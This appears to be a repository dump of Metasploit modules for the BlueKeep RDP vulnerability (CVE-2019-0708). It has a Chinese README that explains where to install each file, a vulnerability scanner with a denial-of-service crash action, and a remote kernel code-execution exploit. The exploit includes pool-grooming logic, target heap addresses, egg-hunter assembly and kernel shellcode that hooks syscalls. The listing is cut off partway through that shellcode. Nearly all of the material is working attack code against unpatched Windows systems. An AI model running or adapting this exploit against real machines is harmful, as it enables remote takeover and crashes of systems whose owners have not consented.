├── 1.png
├── README.md
├── cve_2019_0708_bluekeep.rb
├── cve_2019_0708_bluekeep_rce.rb
├── rdp.rb
└── rdp_scanner.rb


/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NAXG/cve_2019_0708_bluekeep_rce/75a930c5752b8773edbd52fc84c93aedd8c81496/1.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | https://github.com/rapid7/metasploit-framework/pull/12283
 2 | 
 3 | https://github.com/TinToSer/bluekeep-exploit
 4 | 
 5 | cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
 6 | 
 7 | rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
 8 | 
 9 | rdp_scanner.rb 替换 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
10 | 
11 | cve_2019_0708_bluekeep.rb 替换 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
12 | 
13 | 
14 | ![](./1.png)
15 | 


--------------------------------------------------------------------------------
/cve_2019_0708_bluekeep.rb:
--------------------------------------------------------------------------------
  1 | ##
  2 | # This module requires Metasploit: https://metasploit.com/download
  3 | # Current source: https://github.com/rapid7/metasploit-framework
  4 | ##
  5 | 
  6 | class MetasploitModule < Msf::Auxiliary
  7 |   include Msf::Exploit::Remote::RDP
  8 |   include Msf::Auxiliary::Scanner
  9 |   include Msf::Auxiliary::Report
 10 | 
 11 |   def initialize(info = {})
 12 |     super(update_info(info,
 13 |       'Name'           => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check',
 14 |       'Description'    => %q{
 15 |         This module checks a range of hosts for the CVE-2019-0708 vulnerability
 16 |         by binding the MS_T120 channel outside of its normal slot and sending
 17 |         non-DoS packets which respond differently on patched and vulnerable hosts.
 18 |         It can optionally trigger the DoS vulnerability.
 19 |       },
 20 |       'Author'         =>
 21 |         [
 22 |           'National Cyber Security Centre', # Discovery
 23 |           'JaGoTu',                         # Module
 24 |           'zerosum0x0',                     # Module
 25 |           'Tom Sellers'                     # TLS support, packet documenentation, DoS implementation
 26 |         ],
 27 |       'References'     =>
 28 |         [
 29 |           [ 'CVE', '2019-0708' ],
 30 |           [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ]
 31 |         ],
 32 |       'DisclosureDate' => '2019-05-14',
 33 |       'License'        => MSF_LICENSE,
 34 |       "Actions" => [
 35 |         ["Scan", "Description" => "Scan for exploitable targets"],
 36 |         ["Crash", "Description" => "Trigger denial of service vulnerability"],
 37 |       ],
 38 |       "DefaultAction" => "Scan",
 39 |       'Notes'          =>
 40 |         {
 41 |           'Stability' => [ CRASH_SAFE ],
 42 |           'AKA'       => ['BlueKeep']
 43 |         }
 44 |     ))
 45 |   end
 46 | 
 47 |   def report_goods
 48 |     report_vuln(
 49 |       :host  => rhost,
 50 |       :port  => rport,
 51 |       :proto => 'tcp',
 52 |       :name  => self.name,
 53 |       :info  => 'Behavior indicates a missing Microsoft Windows RDP patch for CVE-2019-0708',
 54 |       :refs  => self.references
 55 |     )
 56 |   end
 57 | 
 58 |   def run_host(ip)
 59 |     # Allow the run command to call the check command
 60 | 
 61 |     status = check_host(ip)
 62 |     if status == Exploit::CheckCode::Vulnerable
 63 |       print_good(status[1].to_s)
 64 |     elsif status == Exploit::CheckCode::Unsupported  # used to display custom msg error
 65 |       status = Exploit::CheckCode::Safe
 66 |       print_status("The target service is not running or refused our connection.")
 67 |     else
 68 |       print_status(status[1].to_s)
 69 |     end
 70 | 
 71 |     status
 72 |   end
 73 | 
 74 |   def rdp_reachable
 75 |     rdp_connect
 76 |     rdp_disconnect
 77 |     return true
 78 |   rescue Rex::ConnectionRefused
 79 |     return false
 80 |   rescue Rex::ConnectionTimeout
 81 |     return false
 82 |   end
 83 | 
 84 |   def check_host(_ip)
 85 |     # The check command will call this method instead of run_host
 86 |     status = Exploit::CheckCode::Unknown
 87 | 
 88 |     begin
 89 |       begin
 90 |         rdp_connect
 91 |       rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
 92 |         return Exploit::CheckCode::Unsupported # used to display custom msg error
 93 |       end
 94 | 
 95 |       status = check_rdp_vuln
 96 |     rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e
 97 |       bt = e.backtrace.join("\n")
 98 |       vprint_error("Unexpected error: #{e.message}")
 99 |       vprint_line(bt)
100 |       elog("#{e.message}\n#{bt}")
101 |     rescue RdpCommunicationError
102 |       vprint_error("Error communicating RDP protocol.")
103 |       status = Exploit::CheckCode::Unknown
104 |     rescue Errno::ECONNRESET
105 |       vprint_error("Connection reset")
106 |     rescue => e
107 |       bt = e.backtrace.join("\n")
108 |       vprint_error("Unexpected error: #{e.message}")
109 |       vprint_line(bt)
110 |       elog("#{e.message}\n#{bt}")
111 |     ensure
112 |       rdp_disconnect
113 |     end
114 | 
115 |     status
116 |   end
117 | 
118 |   def check_for_patch
119 |     begin
120 |       6.times do
121 |         _res = rdp_recv
122 |       end
123 |     rescue RdpCommunicationError
124 |       # we don't care
125 |     end
126 | 
127 |     # The loop below sends Virtual Channel PDUs (2.2.6.1) that vary in length
128 |     # The arch governs which of the packets triggers the desired response
129 |     # which is an MCS Disconnect Provider Ultimatum or a timeout.
130 | 
131 |     # Disconnect Provider message of a valid size for each platform
132 |     # has proven to be safe to send as part of the vulnerability check.
133 |     x86_string = "00000000020000000000000000000000"
134 |     x64_string = "0000000000000000020000000000000000000000000000000000000000000000"
135 | 
136 |     if action.name == 'Crash'
137 |       vprint_status("Sending denial of service payloads")
138 |       # Length and chars are arbitrary but total length needs to be longer than
139 |       # 16 for x86 and 32 for x64. Making the payload too long seems to cause
140 |       # the DoS to fail. Note that sometimes the DoS seems to fail. Increasing
141 |       # the payload size and sending more of them doesn't seem to improve the
142 |       # reliability. It *seems* to happen more often on x64, I haven't seen it
143 |       # fail against x86. Repeated attempts will generally trigger the DoS.
144 |       x86_string += "FF" * 1
145 |       x64_string += "FF" * 2
146 |     else
147 |       vprint_status("Sending patch check payloads")
148 |     end
149 | 
150 |     chan_flags = RDPConstants::CHAN_FLAG_FIRST | RDPConstants::CHAN_FLAG_LAST
151 |     channel_id = [1005].pack('S>')
152 |     x86_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x86_string].pack("H*")), channel_id)
153 | 
154 |     x64_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x64_string].pack("H*")), channel_id)
155 | 
156 |     6.times do
157 |       rdp_send(x86_packet)
158 |       rdp_send(x64_packet)
159 | 
160 |       # A single pass should be sufficient to cause DoS
161 |       if action.name == 'Crash'
162 |         sleep(1)
163 |         rdp_disconnect
164 | 
165 |         sleep(5)
166 |         if rdp_reachable
167 |           print_error("Target doesn't appear to have been crashed. Consider retrying.")
168 |           return Exploit::CheckCode::Unknown
169 |         else
170 |           print_good("Target service appears to have been successfully crashed.")
171 |           return Exploit::CheckCode::Vulnerable
172 |         end
173 |       end
174 | 
175 |       # Quick check for the Ultimatum PDU
176 |       begin
177 |         res = rdp_recv(-1, 1)
178 |       rescue EOFError
179 |         # we don't care
180 |       end
181 |       return Exploit::CheckCode::Vulnerable if res&.include?(["0300000902f0802180"].pack("H*"))
182 | 
183 |       # Slow check for Ultimatum PDU. If it doesn't respond in a timely
184 |       # manner then the host is likely patched.
185 |       begin
186 |         4.times do
187 |           res = rdp_recv
188 |           # 0x2180 = MCS Disconnect Provider Ultimatum PDU - 2.2.2.3
189 |           if res.include?(["0300000902f0802180"].pack("H*"))
190 |             return Exploit::CheckCode::Vulnerable
191 |           end
192 |         end
193 |       rescue RdpCommunicationError
194 |         # we don't care
195 |       end
196 |     end
197 | 
198 |     Exploit::CheckCode::Safe
199 |   end
200 | 
201 |   def check_rdp_vuln
202 |     # check if rdp is open
203 |     is_rdp, version_info = rdp_fingerprint
204 |     unless is_rdp
205 |       vprint_status "Could not connect to RDP service."
206 |       return Exploit::CheckCode::Unknown
207 |     end
208 |     rdp_disconnect
209 |     rdp_connect
210 |     is_rdp, server_selected_proto = rdp_check_protocol
211 | 
212 |     requires_nla = [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto
213 |     product_version = (version_info && version_info[:product_version]) ? version_info[:product_version] : 'N/A'
214 |     info = "Detected RDP on #{peer} (Windows version: #{product_version})"
215 | 
216 |     service_info = "Requires NLA: #{(!version_info[:product_version].nil? && requires_nla) ? 'Yes' : 'No'}"
217 |     info << " (#{service_info})"
218 | 
219 |     print_status(info)
220 | 
221 |     if requires_nla
222 |       vprint_status("Server requires NLA (CredSSP) security which mitigates this vulnerability.")
223 |       return Exploit::CheckCode::Safe
224 |     end
225 | 
226 |     chans = [
227 |       ['cliprdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
228 |       ['MS_T120',   RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],
229 |       ['rdpsnd',  RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
230 |       ['snddbg',  RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
231 |       ['rdpdr',   RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],
232 |     ]
233 | 
234 |     success = rdp_negotiate_security(chans, server_selected_proto)
235 |     return Exploit::CheckCode::Unknown unless success
236 | 
237 |     rdp_establish_session
238 | 
239 |     result = check_for_patch
240 | 
241 |     if result == Exploit::CheckCode::Vulnerable
242 |       report_goods
243 |     end
244 | 
245 |     # Can't determine, but at least we know the service is running
246 |     result
247 |   end
248 | 
249 | end
250 | 
251 | 


--------------------------------------------------------------------------------
/cve_2019_0708_bluekeep_rce.rb:
--------------------------------------------------------------------------------
   1 | ##
   2 | # This module requires Metasploit: https://metasploit.com/download
   3 | # Current source: https://github.com/rapid7/metasploit-framework
   4 | ##
   5 | 
   6 | #  Exploitation and Caveats from zerosum0x0:
   7 | #
   8 | #    1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally.
   9 | #    2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py)
  10 | #    3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120.
  11 | #    4. RDP has chunked messages, so we use this to groom.
  12 | #       a. Chunked messaging ONLY works properly when sent to RDPSND/MS_T120.
  13 | #       b. However, on 7+, MS_T120 will not work and you have to use RDPSND.
  14 | #           i. RDPSND only works when
  15 | #              HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0
  16 | #           ii. This registry key is not a default setting for server 2008 R2. SHITTY ISSUE
  17 | #    5. Use chunked grooming to fit new data in the freed channel, account for
  18 | #       the allocation header size (like 0x38 I think?). At offset 0x100? is where
  19 | #       the "call [rax]" gadget will get its pointer from.
  20 | #       a. The NonPagedPool (NPP) starts at a fixed address on XP-7
  21 | #           i. Hot-swap memory is another SHITTY ISSUE. With certain VMWare and
  22 | #           Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP
  23 | #           start. This can be anywhere from 100 mb to gigabytes of offset
  24 | #           before the NPP start.
  25 | #       b. Set offset 0x100 to NPPStart+SizeOfGroomInMB
  26 | #       c. Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need
  27 | #          [NPPStart+SizeOfGroomInMB+8...payload]... because "call [rax]" is an
  28 | #          indirect call
  29 | #       d. We are limited to 0x400 payloads by channel chunk max size. My
  30 | #          current shellcode is a twin shellcode with eggfinders. I spam the
  31 | #          kernel payload and user payload, and if user payload is called first it
  32 | #          will egghunt for the kernel payload.
  33 | #    6. After channel hole is filled and the NPP is spammed up with shellcode,
  34 | #       trigger the free by closing the socket.
  35 | #
  36 | #    TODO:
  37 | #    * Detect OS specifics / obtain memory leak to determine NPP start address.
  38 | #    * Write the XP/2003 portions grooming MS_T120.
  39 | #    * Detect if RDPSND grooming is working or not?
  40 | #    * Expand channels besides RDPSND/MS_T120 for grooming.
  41 | #        See https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/
  42 | #
  43 | #    https://github.com/0xeb-bp/bluekeep .. this repo has code for grooming
  44 | #    MS_T120 on XP... should be same process as the RDPSND
  45 | 
  46 | class MetasploitModule < Msf::Exploit::Remote
  47 | 
  48 |   Rank = ManualRanking
  49 | 
  50 |   USERMODE_EGG = 0xb00dac0fefe31337
  51 |   KERNELMODE_EGG = 0xb00dac0fefe42069
  52 | 
  53 |   CHUNK_SIZE = 0x400
  54 |   HEADER_SIZE = 0x48
  55 | 
  56 |   include Msf::Exploit::Remote::RDP
  57 |   include Msf::Exploit::Remote::CheckScanner
  58 | 
  59 |   def initialize(info = {})
  60 |     super(update_info(info,
  61 |       'Name'           => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free',
  62 |       'Description'    => %q(
  63 |         The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,
  64 |         allowing a malformed Disconnect Provider Indication message to cause use-after-free.
  65 |         With a controllable data/size remote nonpaged pool spray, an indirect call gadget of
  66 |         the freed channel is used to achieve arbitrary code execution.
  67 |       ),
  68 |       'Author' =>
  69 |       [
  70 |         'Sean Dillon <sean.dillon@risksense.com>',  # @zerosum0x0 - Original exploit
  71 |         'Ryan Hanson <dunno@findthisout.com>',      # @ryHanson - Original exploit
  72 |         'OJ Reeves <oj@beyondbinary.io>',           # @TheColonial - Metasploit module
  73 |         'Brent Cook <bcook@rapid7.com>',            # @busterbcook - Assembly whisperer
  74 |       ],
  75 |       'License' => MSF_LICENSE,
  76 |       'References' =>
  77 |         [
  78 |           ['CVE', '2019-0708'],
  79 |           ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],
  80 |         ],
  81 |       'DefaultOptions' =>
  82 |         {
  83 |           'EXITFUNC' => 'thread',
  84 |           'WfsDelay' => 5,
  85 |           'RDP_CLIENT_NAME' => 'ethdev',
  86 |           'CheckScanner' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep'
  87 |         },
  88 |       'Privileged' => true,
  89 |       'Payload' =>
  90 |         {
  91 |           'Space' => CHUNK_SIZE - HEADER_SIZE,
  92 |           'EncoderType' => Msf::Encoder::Type::Raw,
  93 |         },
  94 |       'Platform' => 'win',
  95 |       'Targets' =>
  96 |         [
  97 |           [
  98 |             'Automatic targeting via fingerprinting',
  99 |             {
 100 |               'Arch' => [ARCH_X64],
 101 |               'FingerprintOnly' => true
 102 |             },
 103 |           ],
 104 |           #
 105 |           #
 106 |           # Windows 2008 R2 requires the following registry change from default:
 107 |           #
 108 |           # [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd]
 109 |           # "fDisableCam"=dword:00000000
 110 |           #
 111 |           [
 112 |             'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',
 113 |             {
 114 |               'Platform' => 'win',
 115 |               'Arch' => [ARCH_X64],
 116 |               'GROOMBASE' => 0xfffffa8003800000
 117 |             }
 118 |           ],
 119 |           [
 120 |             # This works with Virtualbox 6
 121 |             'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)',
 122 |             {
 123 |               'Platform' => 'win',
 124 |               'Arch' => [ARCH_X64],
 125 |               'GROOMBASE' => 0xfffffa8002407000
 126 |             }
 127 |           ],
 128 |           [
 129 |             # This address works on VMWare 15 on Windows.
 130 |             'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)',
 131 |             {
 132 |               'Platform' => 'win',
 133 |               'Arch' => [ARCH_X64],
 134 |               'GROOMBASE' => 0xfffffa8018C00000
 135 |               #'GROOMBASE' => 0xfffffa801C000000
 136 |             }
 137 |           ],
 138 |           [
 139 |             'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',
 140 |             {
 141 |               'Platform' => 'win',
 142 |               'Arch' => [ARCH_X64],
 143 |               'GROOMBASE' => 0xfffffa8102407000
 144 |             }
 145 |           ],
 146 |         ],
 147 |       'DefaultTarget' => 0,
 148 |       'DisclosureDate' => 'May 14 2019',
 149 |       'Notes' =>
 150 |         {
 151 |           'AKA' => ['Bluekeep']
 152 |         }
 153 |     ))
 154 | 
 155 |     register_advanced_options(
 156 |       [
 157 |         OptBool.new('ForceExploit', [false, 'Override check result', false]),
 158 |         OptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]),
 159 |         OptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]),
 160 |         OptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]),
 161 |       ]
 162 |     )
 163 |   end
 164 | 
 165 |   def exploit
 166 |     unless check == CheckCode::Vulnerable || datastore['ForceExploit']
 167 |       fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
 168 |     end
 169 | 
 170 |     if target['FingerprintOnly']
 171 |       fail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually')
 172 |     end
 173 | 
 174 |     begin
 175 |       rdp_connect
 176 |     rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
 177 |       fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')
 178 |     end
 179 | 
 180 |     is_rdp, server_selected_proto = rdp_check_protocol
 181 |     unless is_rdp
 182 |       fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')
 183 |     end
 184 | 
 185 |     # We don't currently support NLA in the mixin or the exploit. However, if we have valid creds, NLA shouldn't stop us
 186 |     # from exploiting the target.
 187 |     if [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto)
 188 |       fail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.')
 189 |     end
 190 | 
 191 |     chans = [
 192 |       ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP],
 193 |       [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
 194 |       [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
 195 |       ['MS_XXX0', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
 196 |       ['MS_XXX1', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
 197 |       ['MS_XXX2', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
 198 |       ['MS_XXX3', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
 199 |       ['MS_XXX4', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
 200 |       ['MS_XXX5', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
 201 |       ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
 202 |     ]
 203 | 
 204 |     @mst120_chan_id = 1004 + chans.length - 1
 205 | 
 206 |     unless rdp_negotiate_security(chans, server_selected_proto)
 207 |       fail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.')
 208 |     end
 209 | 
 210 |     rdp_establish_session
 211 | 
 212 |     rdp_dispatch_loop
 213 |   end
 214 | 
 215 | private
 216 | 
 217 |   # This function is invoked when the PAKID_CORE_CLIENTID_CONFIRM message is
 218 |   # received on a channel, and this is when we need to kick off our exploit.
 219 |   def rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data)
 220 |     # We have to do the default behaviour first.
 221 |     super(pkt, user, chan_id, flags, data)
 222 | 
 223 |     groom_size = datastore['GROOMSIZE']
 224 |     pool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size)
 225 |     groom_chan_count = datastore['GROOMCHANNELCOUNT']
 226 | 
 227 |     payloads = create_payloads(pool_addr)
 228 | 
 229 |     print_status("Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.")
 230 | 
 231 |     target_channel_id = chan_id + 1
 232 | 
 233 |     spray_buffer = create_exploit_channel_buffer(pool_addr)
 234 |     spray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF)
 235 |     free_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80
 236 | 
 237 |     print_status("Surfing channels ...")
 238 |     rdp_send(spray_channel * 1024)
 239 |     rdp_send(free_trigger)
 240 | 
 241 |     chan_surf_size = 0x421
 242 |     spray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min
 243 |     chan_surf_packet = spray_channel * spray_packets
 244 |     chan_surf_count  = chan_surf_size / spray_packets
 245 | 
 246 |     chan_surf_count.times do
 247 |       rdp_send(chan_surf_packet)
 248 |     end
 249 | 
 250 |     print_status("Lobbing eggs ...")
 251 | 
 252 |     groom_mb = groom_size * 1024 / payloads.length
 253 | 
 254 |     groom_mb.times do
 255 |       tpkts = ''
 256 |       for c in 0..groom_chan_count
 257 |         payloads.each do |p|
 258 |           tpkts += rdp_create_channel_msg(self.rdp_user_id, target_channel_id + c, p, 0, 0xFFFFFFF)
 259 |         end
 260 |       end
 261 |       rdp_send(tpkts)
 262 |     end
 263 | 
 264 |     # Terminating and disconnecting forces the USE
 265 |     print_status("Forcing the USE of FREE'd object ...")
 266 |     rdp_terminate
 267 |     rdp_disconnect
 268 |   end
 269 | 
 270 |   # Helper function to create the kernel mode payload and the usermode payload with
 271 |   # the egg hunter prefix.
 272 |   def create_payloads(pool_address)
 273 |     begin
 274 |       [kernel_mode_payload, user_mode_payload].map { |p|
 275 |         [
 276 |           pool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg
 277 |           p
 278 |         ].pack('<Qa*').ljust(CHUNK_SIZE - HEADER_SIZE, "\x00")
 279 |       }
 280 |     rescue => ex
 281 |       print_error("#{ex.backtrace.join("\n")}: #{ex.message} (#{ex.class})")
 282 |     end
 283 |   end
 284 | 
 285 |   def assemble_with_fixups(asm)
 286 |     # Rewrite all instructions of form 'lea reg, [rel label]' as relative
 287 |     # offsets for the instruction pointer, since metasm's 'ModRM' parser does
 288 |     # not grok that syntax.
 289 |     lea_rel = /lea+\s(?<dest>\w{2,3}),*\s\[rel+\s(?<label>[a-zA-Z_].*)\]/
 290 |     asm.gsub!(lea_rel) do |match|
 291 |       match = "lea #{$1}, [rip + #{$2}]"
 292 |     end
 293 | 
 294 |     # metasm encodes all rep instructions as repnz
 295 |     # https://github.com/jjyg/metasm/pull/40
 296 |     asm.gsub!(/rep+\smovsb/, 'db 0xf3, 0xa4')
 297 | 
 298 |     encoded = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encoded
 299 | 
 300 |     # Fixup above rewritten instructions with the relative label offsets
 301 |     encoded.reloc.each do |offset, reloc|
 302 |       target = reloc.target.to_s
 303 |       if encoded.export.key?(target)
 304 |         # Note: this assumes the address we're fixing up is at the end of the
 305 |         # instruction. This holds for 'lea' but if there are other fixups
 306 |         # later, this might need to change to account for specific instruction
 307 |         # encodings
 308 |         if reloc.type == :i32
 309 |           instr_offset = offset + 4
 310 |         elsif reloc.type == :i16
 311 |           instr_offset = offset + 2
 312 |         end
 313 |         encoded.fixup(target => encoded.export[target] - instr_offset)
 314 |       else
 315 |         raise "Unknown symbol '#{target}' while resolving relative offsets"
 316 |       end
 317 |     end
 318 |     encoded.fill
 319 |     encoded.data
 320 |   end
 321 | 
 322 |   # The user mode payload has two parts. The first is an egg hunter that searches for
 323 |   # the kernel mode payload. The second part is the actual payload that's invoked in
 324 |   # user land (ie. it's injected into spoolsrv.exe). We need to spray both the kernel
 325 |   # and user mode payloads around the heap in different packets because we don't have
 326 |   # enough space to put them both in the same chunk. Given that code exec can result in
 327 |   # landing on the user land payload, the egg is used to go to a kernel payload.
 328 |   def user_mode_payload
 329 | 
 330 |     # Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya
 331 |     #
 332 |     # This shellcode was written originally for eternalblue exploits
 333 |     # eternalblue_exploit7.py and eternalblue_exploit8.py
 334 |     #
 335 |     # Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)
 336 |     #
 337 |     # Note:
 338 |     # - The userland shellcode is run in a new thread of system process.
 339 |     #     If userland shellcode causes any exception, the system process get killed.
 340 |     # - On idle target with multiple core processors, the hijacked system call
 341 |     #     might take a while (> 5 minutes) to get called because the system
 342 |     #     call may be called on other processors.
 343 |     # - The shellcode does not allocate shadow stack if possible for minimal shellcode size.
 344 |     #     This is ok because some Windows functions do not require a shadow stack.
 345 |     # - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.
 346 |     #     Note: the Windows 8 version macros are removed below
 347 |     # - The userland payload MUST be appened to this shellcode.
 348 |     #
 349 |     # References:
 350 |     # - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)
 351 |     # - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c
 352 | 
 353 |     asm = %Q^
 354 | _start:
 355 |     lea rcx, [rel _start]
 356 |     mov r8, 0x#{KERNELMODE_EGG.to_s(16)}
 357 | _egg_loop:
 358 |     sub rcx, 0x#{CHUNK_SIZE.to_s(16)}
 359 |     sub rax, 0x#{CHUNK_SIZE.to_s(16)}
 360 |     mov rdx, [rcx - 8]
 361 |     cmp rdx, r8
 362 |     jnz _egg_loop
 363 |     jmp rcx
 364 |     ^
 365 |     egg_loop = assemble_with_fixups(asm)
 366 | 
 367 |     # The USERMODE_EGG is required at the start as well, because the exploit code
 368 |     # assumes the tag is there, and jumps over it to find the shellcode.
 369 |     [
 370 |       USERMODE_EGG,
 371 |       egg_loop,
 372 |       USERMODE_EGG,
 373 |       payload.raw
 374 |     ].pack('<Qa*<Qa*')
 375 |   end
 376 | 
 377 |   def kernel_mode_payload
 378 |     data_kapc_offset           = 0x10
 379 |     data_nt_kernel_addr_offset = 0x8
 380 |     data_origin_syscall_offset = 0
 381 |     data_peb_addr_offset       = -0x10
 382 |     data_queueing_kapc_offset  = -0x8
 383 |     hal_heap_storage           = 0xffffffffffd04100
 384 | 
 385 |     # These hashes are not the same as the ones used by the
 386 |     # Block API so they have to be hard-coded.
 387 |     createthread_hash              = 0x835e515e
 388 |     keinitializeapc_hash           = 0x6d195cc4
 389 |     keinsertqueueapc_hash          = 0xafcc4634
 390 |     psgetcurrentprocess_hash       = 0xdbf47c78
 391 |     psgetprocessid_hash            = 0x170114e1
 392 |     psgetprocessimagefilename_hash = 0x77645f3f
 393 |     psgetprocesspeb_hash           = 0xb818b848
 394 |     psgetthreadteb_hash            = 0xcef84c3e
 395 |     spoolsv_exe_hash               = 0x3ee083d8
 396 |     zwallocatevirtualmemory_hash   = 0x576e99ea
 397 | 
 398 |     asm = %Q^
 399 | shellcode_start:
 400 |     nop
 401 |     nop
 402 |     nop
 403 |     nop
 404 |     ; IRQL is DISPATCH_LEVEL when got code execution
 405 | 
 406 |     push rbp
 407 | 
 408 |     call set_rbp_data_address_fn
 409 | 
 410 |     ; read current syscall
 411 |     mov ecx, 0xc0000082
 412 |     rdmsr
 413 |     ; do NOT replace saved original syscall address with hook syscall
 414 |     lea r9, [rel syscall_hook]
 415 |     cmp eax, r9d
 416 |     je _setup_syscall_hook_done
 417 | 
 418 |     ; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize
 419 |     cmp dword [rbp+#{data_origin_syscall_offset}], eax
 420 |     je _hook_syscall
 421 | 
 422 |     ; save original syscall
 423 |     mov dword [rbp+#{data_origin_syscall_offset}+4], edx
 424 |     mov dword [rbp+#{data_origin_syscall_offset}], eax
 425 | 
 426 |     ; first time on the target
 427 |     mov byte [rbp+#{data_queueing_kapc_offset}], 0
 428 | 
 429 | _hook_syscall:
 430 |     ; set a new syscall on running processor
 431 |     ; setting MSR 0xc0000082 affects only running processor
 432 |     xchg r9, rax
 433 |     push rax
 434 |     pop rdx     ; mov rdx, rax
 435 |     shr rdx, 32
 436 |     wrmsr
 437 | 
 438 | _setup_syscall_hook_done:
 439 |     pop rbp
 440 | 
 441 | ;--------------------- HACK crappy thread cleanup --------------------
